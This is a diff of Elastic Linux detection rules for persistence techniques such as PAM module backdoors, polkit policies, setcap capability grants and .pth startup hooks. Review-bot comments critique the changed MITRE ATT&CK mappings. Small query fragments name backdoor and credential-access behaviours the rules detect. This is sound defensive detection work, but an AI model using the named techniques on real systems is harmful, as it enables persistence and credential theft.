-2,7 +2,7 @@ creation_date = "2023/02/28" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [transform] [[transform.osquery]] 
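Review bot: The second hunk of persistence_manual_dracut_execution.toml adds an Execution entry with `T1059.004` Unix Shell, but the rule detects a manual `dracut` invocation (initramfs regeneration), and T1059 is meant for adversary use of a shell interpreter itself rather than for any process that happens to be implemented as a shell script; this looks like tactic padding that will inflate Execution coverage without a matching detection. If the intent is to capture the shell that launched dracut, say so in the rule `note`; otherwise I would drop the Execution `[[rule.threat]]` block and the `Tactic: Execution` tag and keep T1542 Pre-OS Boot as the single mapping. I am inferring the rule's behaviour from its file name and the T1542 reference in the hunk header, as the query is outside this chunk.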
@@ -179,11 +179,6 @@ id = "T1037" name = "Boot or Logon Initialization Scripts" reference = "https://attack.mitre.org/techniques/T1037/" -[[rule.threat.technique.subtechnique]] -id = "T1037.001" -name = "Logon Script (Windows)" -reference = "https://attack.mitre.org/techniques/T1037/001/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_message_of_the_day_execution.toml b/rules/linux/persistence_message_of_the_day_execution.toml index e685a469553..4e5c181f2dd 100644 --- a/rules/linux/persistence_message_of_the_day_execution.toml +++ b/rules/linux/persistence_message_of_the_day_execution.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/28" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [transform] [[transform.osquery]] @@ -205,11 +205,6 @@ id = "T1037" name = "Boot or Logon Initialization Scripts" reference = "https://attack.mitre.org/techniques/T1037/" -[[rule.threat.technique.subtechnique]] -id = "T1037.001" -name = "Logon Script (Windows)" -reference = "https://attack.mitre.org/techniques/T1037/001/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_network_manager_dispatcher_persistence.toml b/rules/linux/persistence_network_manager_dispatcher_persistence.toml index 5e52842ddea..089f1d5d144 100644 --- a/rules/linux/persistence_network_manager_dispatcher_persistence.toml +++ b/rules/linux/persistence_network_manager_dispatcher_persistence.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] 
@@ -79,7 +79,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -115,11 +126,42 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" 
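Review bot: The persistence_network_manager_dispatcher_persistence.toml threat hunk removes T1546 Event Triggered Execution — NetworkManager dispatcher scripts run in response to network state events, which is the textbook definition of that technique — and replaces it with T1543 Create or Modify System Process, which describes services and daemons rather than hook scripts. The last `[[rule.threat]]` added in the hunk also consists of a TA0005 Defense Evasion tactic with no `[[rule.threat.technique]]`, so the new `Tactic: Defense Evasion` tag is backed by an empty mapping. I would restore `id = "T1546"` / `name = "Event Triggered Execution"` as the Persistence technique (T1574 can stay if hijacking the dispatcher path is in scope) and either attach T1574 to the Defense Evasion entry or remove that entry and its tag.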
diff --git a/rules/linux/persistence_openssl_passwd_hash_generation.toml b/rules/linux/persistence_openssl_passwd_hash_generation.toml index f8e54f5938d..dc7660861c7 100644 --- a/rules/linux/persistence_openssl_passwd_hash_generation.toml +++ b/rules/linux/persistence_openssl_passwd_hash_generation.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -111,11 +111,6 @@ not process.args in ("-help", "--help", "-h") [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique]] id = "T1136" name = "Create Account" diff --git a/rules/linux/persistence_pluggable_authentication_module_creation.toml b/rules/linux/persistence_pluggable_authentication_module_creation.toml index 231a8a31bd3..a5bebae77f2 100644 --- a/rules/linux/persistence_pluggable_authentication_module_creation.toml +++ b/rules/linux/persistence_pluggable_authentication_module_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/06" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] 
@@ -119,19 +119,14 @@ file where host.os.type == "linux" and event.action == "creation" and process.ex framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - -[[rule.threat.technique.subtechnique]] -id = "T1556.003" -name = "Pluggable Authentication Modules" -reference = "https://attack.mitre.org/techniques/T1556/003/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -141,12 +136,7 @@ id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" -[[rule.threat.technique.subtechnique]] -id = "T1556.003" -name = "Pluggable Authentication Modules" -reference = "https://attack.mitre.org/techniques/T1556/003/" - [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/persistence_pluggable_authentication_module_creation_in_unusual_dir.toml b/rules/linux/persistence_pluggable_authentication_module_creation_in_unusual_dir.toml index d4ef01be97c..2505889ddd7 100644 --- a/rules/linux/persistence_pluggable_authentication_module_creation_in_unusual_dir.toml +++ b/rules/linux/persistence_pluggable_authentication_module_creation_in_unusual_dir.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] 
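Review bot: Both hunks of persistence_pluggable_authentication_module_creation.toml strip `T1556.003` Pluggable Authentication Modules — the sub-technique that names exactly the artefact a PAM module creation rule watches — and the first hunk substitutes T1543 Create or Modify System Process under Persistence, although a PAM shared object is not a system process or service. The result is a Persistence entry with a wrong-fit technique and a Credential Access entry reduced to the generic T1556 parent. I would keep T1556 with the `[[rule.threat.technique.subtechnique]]` / `id = "T1556.003"` block in both entries (ATT&CK lists T1556 under Credential Access, Defense Evasion and Persistence, so the same technique under two tactics is legitimate) and drop T1543. The query line in the hunk header (`event.action == "creation"`) is all I can see of the detection.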
@@ -101,19 +101,14 @@ file where host.os.type == "linux" and event.type == "creation" and file.name li framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - -[[rule.threat.technique.subtechnique]] -id = "T1556.003" -name = "Pluggable Authentication Modules" -reference = "https://attack.mitre.org/techniques/T1556/003/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -123,12 +118,7 @@ id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" -[[rule.threat.technique.subtechnique]] -id = "T1556.003" -name = "Pluggable Authentication Modules" -reference = "https://attack.mitre.org/techniques/T1556/003/" - [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/persistence_pluggable_authentication_module_pam_exec_backdoor_exec.toml b/rules/linux/persistence_pluggable_authentication_module_pam_exec_backdoor_exec.toml index 03bf5554379..57331335bcc 100644 --- a/rules/linux/persistence_pluggable_authentication_module_pam_exec_backdoor_exec.toml +++ b/rules/linux/persistence_pluggable_authentication_module_pam_exec_backdoor_exec.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/29" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] 
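Review bot: Same concern as the sibling PAM-creation rule: `T1556.003` is the precise mapping for a PAM module dropped into an unusual directory, and it is removed from both entries here while `T1543` is added under Persistence for a shared library that is not a system process. Keep the `T1556.003` sub-technique under T1556 in both entries (T1556 is valid under Persistence) rather than introducing T1543.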
@@ -65,7 +65,15 @@ references = [ risk_score = 47 rule_id = "96f29282-ffcc-4ce7-834b-b17aee905568" severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' sequence by process.entity_id with maxspan=3s @@ -98,16 +106,24 @@ sequence by process.entity_id with maxspan=3s framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - -[[rule.threat.technique.subtechnique]] -id = "T1556.003" -name = "Pluggable Authentication Modules" -reference = "https://attack.mitre.org/techniques/T1556/003/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/persistence_pluggable_authentication_module_source_download.toml b/rules/linux/persistence_pluggable_authentication_module_source_download.toml index 974af680518..458326e408c 100644 --- a/rules/linux/persistence_pluggable_authentication_module_source_download.toml +++ b/rules/linux/persistence_pluggable_authentication_module_source_download.toml 
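Review bot: `T1556.003` is dropped here as well, and `T1543` is placed under Persistence for a pam_exec backdoor — `pam_exec.so` running a script from a PAM config line is the textbook T1556.003 case, not a system-process modification. Suggest keeping `[[rule.threat.technique.subtechnique]] id = "T1556.003"` under T1556 in the new Credential Access entry and using T1556/T1556.003 in the Persistence entry instead of T1543. The `Tactic: Credential Access` tag added in the same hunk is consistent with the new second entry.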
@@ -2,7 +2,7 @@ creation_date = "2024/12/16" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -62,7 +62,17 @@ references = [ risk_score = 47 rule_id = "53ef31ea-1f8a-493b-9614-df23d8277232" severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -75,11 +85,24 @@ process.args like~ "https://github.com/linux-pam/linux-pam/releases/download/v*/ framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/persistence_polkit_policy_creation.toml b/rules/linux/persistence_polkit_policy_creation.toml index 705ed474e08..0735fde6ca8 100644 --- a/rules/linux/persistence_polkit_policy_creation.toml 
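Review bot: Replacing `T1105 Ingress Tool Transfer` with T1543 and T1556 discards the only mapping that describes what the query matches — a download of the linux-pam release archive (`process.args like~ "https://github.com/linux-pam/linux-pam/releases/download/..."`). Fetching source is not itself a system-process or authentication-process change; those happen later, if at all. I'd keep T1105 under Command and Control (and the `Tactic: Command and Control` tag this hunk removes), and add T1556/T1556.003 as the intended follow-on rather than T1543. Only the first line of the query is visible in the hunk header, so this is based on that line.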
+++ b/rules/linux/persistence_polkit_policy_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -54,7 +54,17 @@ Polkit, or PolicyKit, is a system service in Linux environments that manages sys risk_score = 21 rule_id = "0f54e947-9ab3-4dff-9e8d-fb42493eaa2f" severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -100,11 +110,24 @@ file.extension in ("rules", "pkla", "policy") and file.path like~ ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" 
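Review bot: `T1543 Create or Modify System Process` does not fit a rule that fires on creation of polkit `.rules`/`.pkla`/`.policy` files — those are authorization policies, not services or daemons — and the retained `T1556 Modify Authentication Process` already covers Persistence in ATT&CK. Consider keeping `id = "T1556"` in the Persistence entry instead of T1543 so both entries describe the same behaviour. The `Tactic: Credential Access` tag added in the earlier hunk matches the new second entry.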
diff --git a/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml b/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml index fc9be420d9d..ada832ab5a8 100644 --- a/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml +++ b/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/03" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -145,16 +145,6 @@ id = "T1053.003" name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" - -[[rule.threat.technique.subtechnique]] -id = "T1546.017" -name = "Udev Rules" -reference = "https://attack.mitre.org/techniques/T1546/017/" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" diff --git a/rules/linux/persistence_process_capability_set_via_setcap.toml b/rules/linux/persistence_process_capability_set_via_setcap.toml index a915555bf2b..412be59834c 100644 --- a/rules/linux/persistence_process_capability_set_via_setcap.toml +++ b/rules/linux/persistence_process_capability_set_via_setcap.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/03" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] 
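Review bot: Removing `T1546.017 Udev Rules` drops a mapping with no visible justification; the rule's query is outside this hunk, so confirm whether it still matches scripts under `/etc/udev/rules.d` or `/lib/udev` before dropping the sub-technique. If the udev paths are still in the query, the `[[rule.threat.technique]] id = "T1546"` block with the `T1546.017` sub-technique should stay. The technique list continues outside the hunk, and the preceding hunk regresses this file's `updated_date` to 2025/12/22.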
@@ -79,7 +79,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -100,10 +110,13 @@ process.name == "setcap" and not ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [rule.threat.tactic] id = "TA0004" diff --git a/rules/linux/persistence_pth_file_creation.toml b/rules/linux/persistence_pth_file_creation.toml index 78290a1d91f..8492cf01914 100644 --- a/rules/linux/persistence_pth_file_creation.toml +++ b/rules/linux/persistence_pth_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/26" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] 
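Review bot: The rewrite deletes `T1548 Abuse Elevation Control Mechanism` and leaves both threat entries with a tactic but no technique — the inserted Persistence entry, and the Privilege Escalation entry whose only technique this hunk removes. Tactic-only entries add a tag but no ATT&CK coverage, and granting file capabilities with `setcap` is the kind of elevation-control abuse T1548 describes, so I'd keep `[[rule.threat.technique]] id = "T1548"` in the Privilege Escalation entry and either give the Persistence entry a technique or drop it and its tag. The Privilege Escalation entry continues outside the hunk.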
@@ -85,7 +85,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -130,7 +139,38 @@ id = "T1546.018" name = "Python Startup Hooks" reference = "https://attack.mitre.org/techniques/T1546/018/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_rpm_package_installation_from_unusual_parent.toml b/rules/linux/persistence_rpm_package_installation_from_unusual_parent.toml index 6e0ad16550d..378adc56fd5 100644 --- a/rules/linux/persistence_rpm_package_installation_from_unusual_parent.toml 
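Review bot: The new Execution entry maps a `.pth` file to `T1059.004 Unix Shell`, but code in a `.pth` file is executed by the Python interpreter at startup, so `T1059.006 Python` is the sub-technique that matches — the retained `T1546.018 Python Startup Hooks` mapping already says as much. Suggest `id = "T1059.006"`, `name = "Python"`, `reference = "https://attack.mitre.org/techniques/T1059/006/"` for the sub-technique. The added Defense Evasion entry has a tactic and no technique, so it justifies the `Tactic: Defense Evasion` tag but adds no coverage; attach a technique or drop both.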
+++ b/rules/linux/persistence_rpm_package_installation_from_unusual_parent.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/10" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -92,6 +92,11 @@ process.args:("-i" or "--install") [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" @@ -102,10 +107,35 @@ id = "T1546.016" name = "Installer Packages" reference = "https://attack.mitre.org/techniques/T1546/016/" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1195" +name = "Supply Chain Compromise" +reference = "https://attack.mitre.org/techniques/T1195/" + +[[rule.threat.technique.subtechnique]] +id = "T1195.002" +name = "Compromise Software Supply Chain" +reference = "https://attack.mitre.org/techniques/T1195/002/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [rule.new_terms] field = "new_terms_fields" value = ["process.parent.executable"] diff --git a/rules/linux/persistence_setuid_setgid_capability_set.toml b/rules/linux/persistence_setuid_setgid_capability_set.toml index 428eb0ddf21..7dccbc4c3f0 100644 --- a/rules/linux/persistence_setuid_setgid_capability_set.toml +++ b/rules/linux/persistence_setuid_setgid_capability_set.toml 
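Review bot: The new Initial Access entry (`T1195.002 Compromise Software Supply Chain`) implies a `Tactic: Initial Access` tag, but this file's `tags` line is not in the hunk — confirm it was updated, since the other rules in this change add a tag for every tactic they map. An rpm install from an unusual parent is evidence of an installer-package hook (the retained `T1546.016`) rather than of a compromised upstream supply chain, so T1195.002 is a stretch unless the rule is meant to cover poisoned packages specifically. `T1543` and `T1574` are also added under Persistence without sub-techniques; if they are kept, the relevant sub-techniques would make the mapping actionable.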
@@ -2,7 +2,7 @@ creation_date = "2023/09/05" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [transform] [[transform.osquery]] @@ -135,7 +135,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -150,6 +160,14 @@ process.name == "setcap" and process.args : "cap_set?id+ep" and not ( [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" diff --git a/rules/linux/persistence_shared_object_creation.toml b/rules/linux/persistence_shared_object_creation.toml index 4122d6985d9..da1bfc93904 100644 --- a/rules/linux/persistence_shared_object_creation.toml +++ b/rules/linux/persistence_shared_object_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/09" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [transform] [[transform.osquery]] 
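Review bot: The tags rewrite drops `Tactic: Privilege Escalation` and adds `Tactic: Persistence`, but the threat section still contains the `T1548 Abuse Elevation Control Mechanism` entry (its tactic table is outside the hunk, presumably still TA0004), so the tags no longer list every tactic the rule maps. Keep both tags, or remove the second entry if Privilege Escalation is no longer intended. The inserted Persistence entry has a tactic and no technique, so it only adds a tag and no ATT&CK coverage.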
@@ -149,7 +149,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' 
@@ -192,46 +200,11 @@ id = "T1574.006" name = "Dynamic Linker Hijacking" reference = "https://attack.mitre.org/techniques/T1574/006/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - -[[rule.threat.technique.subtechnique]] -id = "T1574.006" -name = "Dynamic Linker Hijacking" -reference = "https://attack.mitre.org/techniques/T1574/006/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - -[[rule.threat.technique.subtechnique]] -id = "T1574.006" -name = "Dynamic Linker Hijacking" -reference = "https://attack.mitre.org/techniques/T1574/006/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" [rule.new_terms] field = "new_terms_fields" value = ["file.name", "process.name"] diff --git a/rules/linux/persistence_simple_web_server_connection_accepted.toml b/rules/linux/persistence_simple_web_server_connection_accepted.toml index 64589559842..11e4f177db0 100644 --- a/rules/linux/persistence_simple_web_server_connection_accepted.toml +++ b/rules/linux/persistence_simple_web_server_connection_accepted.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/17" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] 
